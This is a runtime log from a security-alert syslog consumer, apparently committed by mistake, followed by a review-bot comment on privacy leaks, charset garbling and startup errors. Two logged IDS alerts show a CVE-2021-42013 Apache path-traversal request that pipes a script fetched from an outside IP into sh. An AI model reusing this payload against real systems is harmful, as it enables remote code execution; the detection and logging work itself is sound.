2026-05-19 12:40:52.332 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 458 ms. Found 1 Elasticsearch repository interfaces.
|
||||
2026-05-19 12:40:52.338 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
|
||||
2026-05-19 12:40:52.338 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Reactive Elasticsearch repositories in DEFAULT mode.
|
||||
2026-05-19 12:40:52.444 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Reactive Elasticsearch - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Reactive Elasticsearch repository, consider annotating your entities with one of these annotations: org.springframework.data.elasticsearch.annotations.Document (preferred), or consider extending one of the following types with your repository: org.springframework.data.elasticsearch.repository.ReactiveElasticsearchRepository
|
||||
2026-05-19 12:40:52.444 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 105 ms. Found 0 Reactive Elasticsearch repository interfaces.
|
||||
2026-05-19 12:40:52.456 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
|
||||
2026-05-19 12:40:52.457 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Redis repositories in DEFAULT mode.
|
||||
2026-05-19 12:40:52.573 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Redis - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Redis repository, consider annotating your entities with one of these annotations: org.springframework.data.redis.core.RedisHash (preferred), or consider extending one of the following types with your repository: org.springframework.data.keyvalue.repository.KeyValueRepository
|
||||
2026-05-19 12:40:52.573 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 107 ms. Found 0 Redis repository interfaces.
|
||||
2026-05-19 12:40:53.277 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat initialized with port(s): 8289 (http)
|
||||
2026-05-19 12:40:53.285 [main] INFO o.a.coyote.http11.Http11NioProtocol - Initializing ProtocolHandler ["http-nio-8289"]
|
||||
2026-05-19 12:40:53.286 [main] INFO o.a.catalina.core.StandardService - Starting service [Tomcat]
|
||||
2026-05-19 12:40:53.286 [main] INFO o.a.catalina.core.StandardEngine - Starting Servlet engine: [Apache Tomcat/9.0.65]
|
||||
2026-05-19 12:40:53.472 [main] INFO o.a.c.c.C.[.[localhost].[/xdrrule] - Initializing Spring embedded WebApplicationContext
|
||||
2026-05-19 12:40:53.472 [main] INFO o.s.b.w.s.c.ServletWebServerApplicationContext - Root WebApplicationContext: initialization completed in 3810 ms
|
||||
2026-05-19 12:40:53.520 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: private static com.common.service.DmColumnService com.syslogRuleApplication.dmColumnService
|
||||
2026-05-19 12:40:56.662 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
|
||||
2026-05-19 12:40:57.019 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.insert] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Insert]
|
||||
2026-05-19 12:40:57.028 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.update] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Update]
|
||||
2026-05-19 12:40:57.044 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.deleteById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.DeleteById]
|
||||
2026-05-19 12:40:57.047 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.selectById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.SelectById]
|
||||
2026-05-19 12:40:57.093 [main] ERROR c.b.m.core.MybatisConfiguration - mapper[com.common.mapper.SecExceptionAlgorithmMapper.findById] is ignored, because it exists, maybe from xml file
|
||||
2026-05-19 12:41:02.982 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
|
||||
2026-05-19 12:41:03.688 [main] INFO com.common.util.MyBatisUtil - MyBatis 初始化成功
|
||||
2026-05-19 12:41:04.562 [main] INFO org.quartz.impl.StdSchedulerFactory - Using default implementation for ThreadExecutor
|
||||
2026-05-19 12:41:04.574 [main] INFO o.quartz.core.SchedulerSignalerImpl - Initialized Scheduler Signaller of type: class org.quartz.core.SchedulerSignalerImpl
|
||||
2026-05-19 12:41:04.574 [main] INFO org.quartz.core.QuartzScheduler - Quartz Scheduler v.2.3.2 created.
|
||||
2026-05-19 12:41:04.575 [main] INFO org.quartz.simpl.RAMJobStore - RAMJobStore initialized.
|
||||
2026-05-19 12:41:04.576 [main] INFO org.quartz.core.QuartzScheduler - Scheduler meta-data: Quartz Scheduler (v2.3.2) 'quartzScheduler' with instanceId 'NON_CLUSTERED'
|
||||
Scheduler class: 'org.quartz.core.QuartzScheduler' - running locally.
|
||||
NOT STARTED.
|
||||
Currently in standby mode.
|
||||
Number of jobs executed: 0
|
||||
Using thread pool 'org.quartz.simpl.SimpleThreadPool' - with 10 threads.
|
||||
Using job-store 'org.quartz.simpl.RAMJobStore' - which does not support persistence. and is not clustered.
|
||||
|
||||
2026-05-19 12:41:04.576 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler 'quartzScheduler' initialized from an externally provided properties instance.
|
||||
2026-05-19 12:41:04.576 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler version: 2.3.2
|
||||
2026-05-19 12:41:04.576 [main] INFO org.quartz.core.QuartzScheduler - JobFactory set to: org.springframework.scheduling.quartz.SpringBeanJobFactory@22726bc7
|
||||
2026-05-19 12:41:04.790 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
|
||||
2026-05-19 12:41:04.790 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
|
||||
2026-05-19 12:41:04.790 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779165664788
|
||||
2026-05-19 12:41:04.811 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
|
||||
2026-05-19 12:41:04.812 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
|
||||
2026-05-19 12:41:04.812 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779165664811
|
||||
2026-05-19 12:41:04.814 [main] INFO o.a.coyote.http11.Http11NioProtocol - Starting ProtocolHandler ["http-nio-8289"]
|
||||
2026-05-19 12:41:04.831 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat started on port(s): 8289 (http) with context path '/xdrrule'
|
||||
2026-05-19 12:41:04.833 [main] INFO o.s.s.quartz.SchedulerFactoryBean - Starting Quartz Scheduler now
|
||||
2026-05-19 12:41:04.834 [main] INFO org.quartz.core.QuartzScheduler - Scheduler quartzScheduler_$_NON_CLUSTERED started.
|
||||
2026-05-19 12:41:04.848 [main] INFO com.syslogRuleApplication - Started syslogRuleApplication in 15.717 seconds (JVM running for 19.644)
|
||||
2026-05-19 12:41:05.211 [org.springframework.kafka.KafkaListenerEndpointContainer#0-1-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - agent-syslog-group: partitions assigned: []
|
||||
2026-05-19 12:41:05.255 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - agent-syslog-group: partitions assigned: [agent-syslog-topic-0]
|
||||
2026-05-19 12:49:22.611 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO c.Modules.NormalData.SysLogProcessor - 开始处理批次消息,数量: 1
|
||||
2026-05-19 12:49:23.521 [log-processor-1] INFO c.Modules.NormalData.SysLogProcessor - 收到syslogmessage:[receive_time=20260519124920569 device_id=103 device_name=公司开发内部测试探针 vendor=null data_type=json device_collect_id=1]<128>May 02 20:05:46 2026 {"sendHostAddress":"192.168.101.251", "deviceAssetSubTypeId":"59", "machineCode":"000d484ba79b", "interfaceName":"eth2", "transProtocol":"TCP", "appProtocol":"http", "logSessionId":"2605022005460345601", "srcAddress":"192.168.101.1", "srcPort":"41614", "srcMacAddress":"90-F1-B0-FA-CD-2A", "destMacAddress":"FA-16-C0-A8-65-AD", "destAddress":"192.168.101.173", "destPort":"80", "vlanId":"0", "vxlanId":"0", "productVendorName":"????", "deviceAddress":"192.168.101.251", "eventCount":"1", "deviceSendProductName":"????APT??????????????????", "deviceProductType":"????????", "deviceName":"devicename", "deviceId":"0", "deviceVersion":"2.0.79.89080.260305_ruletag_2.0.31216.260424.1", "srcGeoCountry":"?й?", "srcGeoRegion":"???", "srcGeoCity":"???", "srcGeoLongitude":"114.156924", "srcGeoLatitude":"22.340151", "destGeoCountry":"?й?", "destGeoRegion":"???", "destGeoCity":"???", "destGeoLongitude":"114.156924", "destGeoLatitude":"22.340151", "direction":"11", "attackerAddress":"srcAddress", "victimAddress":"destAddress", "attackDirection":"1", "attacker":["192.168.101.1"], "victim":["192.168.101.173"], "srcSecurityZone":"outer", "destSecurityZone":"outer", "logType":"alert", "dataType":"ids", "dataSubType":"attackAlert", "deviceCat":"/IDS/Network", "catObject":"/Host/Application/Service", "catBehavior":"/Access", "catOutcome":"FAIL", "catTechnique":"/Exploit/DirectoryTraversal", "severity":"5", "catSignificance":"/Informational/Warning", "eventId":"2605022005460000360199631657902", "startTime":"2026-05-02 20:05:46", "endTime":"2026-05-02 20:05:46", "deviceReceiptTime":"2026-05-02 20:05:46", "collectorReceiptTime":"2026-05-02 20:05:46", "ruleId":"93008265", "ruleName":"Apache HTTP Server 2.4.49 ·???????? 
(CVE-2021-42013)", "alarmType":"WEB????->·??????", "ruleType":"/WebAttack/DirTraversal", "requestMethod":"POST", "requestUrlQuery":"/cgi-bin/../../../../../../../bin/sh", "requestUrl":"/cgi-bin/../../../../../../../bin/sh", "requestHeader":"POST /cgi-bin/../../../../../../../bin/sh HTTP/1.1<br/>Host: 43.255.55.45:80<br/>Upgrade-Insecure-Requests: 1<br/>Accept: */*<br/>User-Agent: libredtail-http<br/>Connection: keep-alive<br/>Content-Type: text/plain<br/>Content-Length: 123<br/>", "requestBody":"(wget --no-check-certificate -qO- https://125.135.169.171/sh || curl -sk https://125.135.169.171/sh) | sh -s apache.selfrep", "responseHeader":"HTTP/1.1 400 Bad Request<br/>Content-Type: text/html; charset=us-ascii<br/>Server: Microsoft-HTTPAPI/2.0<br/>Date: Sat, 02 May 2026 12:05:45 GMT<br/>Connection: close<br/>Content-Length: 324<br/>", "responseMsg":"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"><br/><HTML><HEAD><TITLE>Bad Request</TITLE><br/><META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD><br/><BODY><h2>Bad Request - Invalid URL</h2><br/><hr><p>HTTP Error 400. The request URL is invalid.</p><br/></BODY></HTML><br/>", "responseCode":"400", "destHostName":"43.255.55.45:80", "name":"Apache HTTP Server 2.4.49 ·???????? (CVE-2021-42013)", "cve":"CVE-2021-42013", "txId":"0", "confidence":"High", "httpVersion":"HTTP/1.1", "accessAgent":"libredtail-http", "attackStage":"1", "attackStatus":"3", "pcapRecord":"true", "tacticId":"TA0001", "techniquesId":"T1190", "isAPT":"false", "killChain":"KC_Exploitation", "message":"Apache HTTP Server 2.4.49 ·???????? (CVE-2021-42013). ?????192.168.101.1/41614, ????192.168.101.173/80"}
|
||||
2026-05-19 12:49:28.534 [log-processor-1] INFO com.zaxxer.hikari.HikariDataSource - HikariPool-SyslogConsumer-rule - Starting...
|
||||
2026-05-19 12:49:29.193 [log-processor-1] INFO com.zaxxer.hikari.HikariDataSource - HikariPool-SyslogConsumer-rule - Start completed.
|
||||
2026-05-19 12:49:29.660 [log-processor-1] WARN c.c.service.LogDataFilterService - 泛化规则-数据过滤规则为空,默认不处理!
|
||||
2026-05-19 12:49:30.119 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO c.Modules.NormalData.SysLogProcessor - 批次处理完成,总数: 1
|
||||
2026-05-19 12:53:33.743 [background-preinit] INFO o.h.validator.internal.util.Version - HV000001: Hibernate Validator 6.2.5.Final
|
||||
2026-05-19 12:53:33.741 [main] INFO com.syslogRuleApplication - Starting syslogRuleApplication using Java 1.8.0_121 on LAPTOP-ARDUR3N0 with PID 32804 (E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr\syslog-consumer-rule\target\classes started by chenc in E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr)
|
||||
2026-05-19 12:53:33.746 [main] INFO com.syslogRuleApplication - No active profile set, falling back to 1 default profile: "default"
|
||||
2026-05-19 12:53:36.246 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
|
||||
2026-05-19 12:53:36.249 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Elasticsearch repositories in DEFAULT mode.
|
||||
2026-05-19 12:53:36.820 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 565 ms. Found 1 Elasticsearch repository interfaces.
|
||||
2026-05-19 12:53:36.826 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
|
||||
2026-05-19 12:53:36.827 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Reactive Elasticsearch repositories in DEFAULT mode.
|
||||
2026-05-19 12:53:36.940 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Reactive Elasticsearch - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Reactive Elasticsearch repository, consider annotating your entities with one of these annotations: org.springframework.data.elasticsearch.annotations.Document (preferred), or consider extending one of the following types with your repository: org.springframework.data.elasticsearch.repository.ReactiveElasticsearchRepository
|
||||
2026-05-19 12:53:36.940 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 113 ms. Found 0 Reactive Elasticsearch repository interfaces.
|
||||
2026-05-19 12:53:36.952 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
|
||||
2026-05-19 12:53:36.953 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Redis repositories in DEFAULT mode.
|
||||
2026-05-19 12:53:37.082 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Redis - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Redis repository, consider annotating your entities with one of these annotations: org.springframework.data.redis.core.RedisHash (preferred), or consider extending one of the following types with your repository: org.springframework.data.keyvalue.repository.KeyValueRepository
|
||||
2026-05-19 12:53:37.082 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 120 ms. Found 0 Redis repository interfaces.
|
||||
2026-05-19 12:53:37.856 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat initialized with port(s): 8289 (http)
|
||||
2026-05-19 12:53:37.865 [main] INFO o.a.coyote.http11.Http11NioProtocol - Initializing ProtocolHandler ["http-nio-8289"]
|
||||
2026-05-19 12:53:37.866 [main] INFO o.a.catalina.core.StandardService - Starting service [Tomcat]
|
||||
2026-05-19 12:53:37.867 [main] INFO o.a.catalina.core.StandardEngine - Starting Servlet engine: [Apache Tomcat/9.0.65]
|
||||
2026-05-19 12:53:38.072 [main] INFO o.a.c.c.C.[.[localhost].[/xdrrule] - Initializing Spring embedded WebApplicationContext
|
||||
2026-05-19 12:53:38.072 [main] INFO o.s.b.w.s.c.ServletWebServerApplicationContext - Root WebApplicationContext: initialization completed in 4241 ms
|
||||
2026-05-19 12:53:38.131 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: private static com.common.service.DmColumnService com.syslogRuleApplication.dmColumnService
|
||||
2026-05-19 12:53:42.124 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
|
||||
2026-05-19 12:53:42.604 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.insert] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Insert]
|
||||
2026-05-19 12:53:42.616 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.update] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Update]
|
||||
2026-05-19 12:53:42.633 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.deleteById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.DeleteById]
|
||||
2026-05-19 12:53:42.637 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.selectById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.SelectById]
|
||||
2026-05-19 12:53:42.691 [main] ERROR c.b.m.core.MybatisConfiguration - mapper[com.common.mapper.SecExceptionAlgorithmMapper.findById] is ignored, because it exists, maybe from xml file
|
||||
2026-05-19 12:53:50.667 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
|
||||
2026-05-19 12:53:51.641 [main] INFO com.common.util.MyBatisUtil - MyBatis 初始化成功
|
||||
2026-05-19 12:53:52.684 [main] INFO org.quartz.impl.StdSchedulerFactory - Using default implementation for ThreadExecutor
|
||||
2026-05-19 12:53:52.702 [main] INFO o.quartz.core.SchedulerSignalerImpl - Initialized Scheduler Signaller of type: class org.quartz.core.SchedulerSignalerImpl
|
||||
2026-05-19 12:53:52.702 [main] INFO org.quartz.core.QuartzScheduler - Quartz Scheduler v.2.3.2 created.
|
||||
2026-05-19 12:53:52.704 [main] INFO org.quartz.simpl.RAMJobStore - RAMJobStore initialized.
|
||||
2026-05-19 12:53:52.705 [main] INFO org.quartz.core.QuartzScheduler - Scheduler meta-data: Quartz Scheduler (v2.3.2) 'quartzScheduler' with instanceId 'NON_CLUSTERED'
|
||||
Scheduler class: 'org.quartz.core.QuartzScheduler' - running locally.
|
||||
NOT STARTED.
|
||||
Currently in standby mode.
|
||||
Number of jobs executed: 0
|
||||
Using thread pool 'org.quartz.simpl.SimpleThreadPool' - with 10 threads.
|
||||
Using job-store 'org.quartz.simpl.RAMJobStore' - which does not support persistence. and is not clustered.
|
||||
|
||||
2026-05-19 12:53:52.705 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler 'quartzScheduler' initialized from an externally provided properties instance.
|
||||
2026-05-19 12:53:52.705 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler version: 2.3.2
|
||||
2026-05-19 12:53:52.705 [main] INFO org.quartz.core.QuartzScheduler - JobFactory set to: org.springframework.scheduling.quartz.SpringBeanJobFactory@3b68a50c
|
||||
2026-05-19 12:53:53.059 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
|
||||
2026-05-19 12:53:53.059 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
|
||||
2026-05-19 12:53:53.059 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779166433056
|
||||
2026-05-19 12:53:53.086 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
|
||||
2026-05-19 12:53:53.086 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
|
||||
2026-05-19 12:53:53.087 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779166433086
|
||||
2026-05-19 12:53:53.089 [main] INFO o.a.coyote.http11.Http11NioProtocol - Starting ProtocolHandler ["http-nio-8289"]
|
||||
2026-05-19 12:53:53.108 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat started on port(s): 8289 (http) with context path '/xdrrule'
|
||||
2026-05-19 12:53:53.110 [main] INFO o.s.s.quartz.SchedulerFactoryBean - Starting Quartz Scheduler now
|
||||
2026-05-19 12:53:53.110 [main] INFO org.quartz.core.QuartzScheduler - Scheduler quartzScheduler_$_NON_CLUSTERED started.
|
||||
2026-05-19 12:53:53.129 [main] INFO com.syslogRuleApplication - Started syslogRuleApplication in 19.974 seconds (JVM running for 26.357)
|
||||
2026-05-19 12:53:53.549 [org.springframework.kafka.KafkaListenerEndpointContainer#0-1-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - agent-syslog-group: partitions assigned: []
|
||||
2026-05-19 12:53:53.570 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - agent-syslog-group: partitions assigned: [agent-syslog-topic-0]
|
||||
2026-05-19 13:00:27.858 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO c.Modules.NormalData.SysLogProcessor - 开始处理批次消息,数量: 1
|
||||
2026-05-19 13:00:28.956 [log-processor-1] INFO c.Modules.NormalData.SysLogProcessor - 收到syslogmessage:[receive_time=20260519130026107 device_id=103 device_name=公司开发内部测试探针 vendor=null data_type=json device_collect_id=1]<128>May 02 20:05:46 2026 {"sendHostAddress":"192.168.101.251", "deviceAssetSubTypeId":"59", "machineCode":"000d484ba79b", "interfaceName":"eth2", "transProtocol":"TCP", "appProtocol":"http", "logSessionId":"2605022005460345601", "srcAddress":"192.168.101.1", "srcPort":"41614", "srcMacAddress":"90-F1-B0-FA-CD-2A", "destMacAddress":"FA-16-C0-A8-65-AD", "destAddress":"192.168.101.173", "destPort":"80", "vlanId":"0", "vxlanId":"0", "productVendorName":"????", "deviceAddress":"192.168.101.251", "eventCount":"1", "deviceSendProductName":"????APT??????????????????", "deviceProductType":"????????", "deviceName":"devicename", "deviceId":"0", "deviceVersion":"2.0.79.89080.260305_ruletag_2.0.31216.260424.1", "srcGeoCountry":"?й?", "srcGeoRegion":"???", "srcGeoCity":"???", "srcGeoLongitude":"114.156924", "srcGeoLatitude":"22.340151", "destGeoCountry":"?й?", "destGeoRegion":"???", "destGeoCity":"???", "destGeoLongitude":"114.156924", "destGeoLatitude":"22.340151", "direction":"11", "attackerAddress":"srcAddress", "victimAddress":"destAddress", "attackDirection":"1", "attacker":["192.168.101.1"], "victim":["192.168.101.173"], "srcSecurityZone":"outer", "destSecurityZone":"outer", "logType":"alert", "dataType":"ids", "dataSubType":"attackAlert", "deviceCat":"/IDS/Network", "catObject":"/Host/Application/Service", "catBehavior":"/Access", "catOutcome":"FAIL", "catTechnique":"/Exploit/DirectoryTraversal", "severity":"5", "catSignificance":"/Informational/Warning", "eventId":"2605022005460000360199631657902", "startTime":"2026-05-02 20:05:46", "endTime":"2026-05-02 20:05:46", "deviceReceiptTime":"2026-05-02 20:05:46", "collectorReceiptTime":"2026-05-02 20:05:46", "ruleId":"93008265", "ruleName":"Apache HTTP Server 2.4.49 ·???????? 
(CVE-2021-42013)", "alarmType":"WEB????->·??????", "ruleType":"/WebAttack/DirTraversal", "requestMethod":"POST", "requestUrlQuery":"/cgi-bin/../../../../../../../bin/sh", "requestUrl":"/cgi-bin/../../../../../../../bin/sh", "requestHeader":"POST /cgi-bin/../../../../../../../bin/sh HTTP/1.1<br/>Host: 43.255.55.45:80<br/>Upgrade-Insecure-Requests: 1<br/>Accept: */*<br/>User-Agent: libredtail-http<br/>Connection: keep-alive<br/>Content-Type: text/plain<br/>Content-Length: 123<br/>", "requestBody":"(wget --no-check-certificate -qO- https://125.135.169.171/sh || curl -sk https://125.135.169.171/sh) | sh -s apache.selfrep", "responseHeader":"HTTP/1.1 400 Bad Request<br/>Content-Type: text/html; charset=us-ascii<br/>Server: Microsoft-HTTPAPI/2.0<br/>Date: Sat, 02 May 2026 12:05:45 GMT<br/>Connection: close<br/>Content-Length: 324<br/>", "responseMsg":"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"><br/><HTML><HEAD><TITLE>Bad Request</TITLE><br/><META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD><br/><BODY><h2>Bad Request - Invalid URL</h2><br/><hr><p>HTTP Error 400. The request URL is invalid.</p><br/></BODY></HTML><br/>", "responseCode":"400", "destHostName":"43.255.55.45:80", "name":"Apache HTTP Server 2.4.49 ·???????? (CVE-2021-42013)", "cve":"CVE-2021-42013", "txId":"0", "confidence":"High", "httpVersion":"HTTP/1.1", "accessAgent":"libredtail-http", "attackStage":"1", "attackStatus":"3", "pcapRecord":"true", "tacticId":"TA0001", "techniquesId":"T1190", "isAPT":"false", "killChain":"KC_Exploitation", "message":"Apache HTTP Server 2.4.49 ·???????? (CVE-2021-42013). ?????192.168.101.1/41614, ????192.168.101.173/80"}
|
||||
2026-05-19 13:00:35.554 [log-processor-1] WARN c.c.service.LogDataFilterService - 泛化规则-数据过滤规则为空,默认不处理!
|
||||
2026-05-19 13:00:35.629 [log-processor-1] INFO com.zaxxer.hikari.HikariDataSource - HikariPool-SyslogConsumer-rule - Starting...
|
||||
2026-05-19 13:00:36.294 [log-processor-1] INFO com.zaxxer.hikari.HikariDataSource - HikariPool-SyslogConsumer-rule - Start completed.
|
||||
2026-05-19 13:00:36.641 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO c.Modules.NormalData.SysLogProcessor - 批次处理完成,总数: 1
|
||||
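Review bot: This added file is a runtime log from a developer workstation and should not be part of the commit. The `Starting syslogRuleApplication` lines record the local hostname, the user name and the checkout path under `E:\GIT_GOSAME\...`. The `SysLogProcessor` lines at 12:49:23.521 and 13:00:28.956 write the complete raw IDS alert at INFO level, including internal addresses, MAC addresses, and the full request and response bodies. Remove the file from the commit, add the log output directory to .gitignore, and have SysLogProcessor log only identifying fields such as eventId and ruleId for each received message, with the full payload at DEBUG if it is needed at all. In the same alert lines the vendor text fields (productVendorName, ruleName, alarmType) appear as `????`, which suggests the payload is being decoded with a charset other than the sender's somewhere before this log line; check that before relying on those fields during parsing and normalization. The startup sequence also reports `Autowired annotation is not supported on static fields` for `syslogRuleApplication.dmColumnService`, so that field is not being injected by Spring, and an ERROR for `SecExceptionAlgorithmMapper.findById` being defined twice. Both are worth fixing in the module this commit introduces.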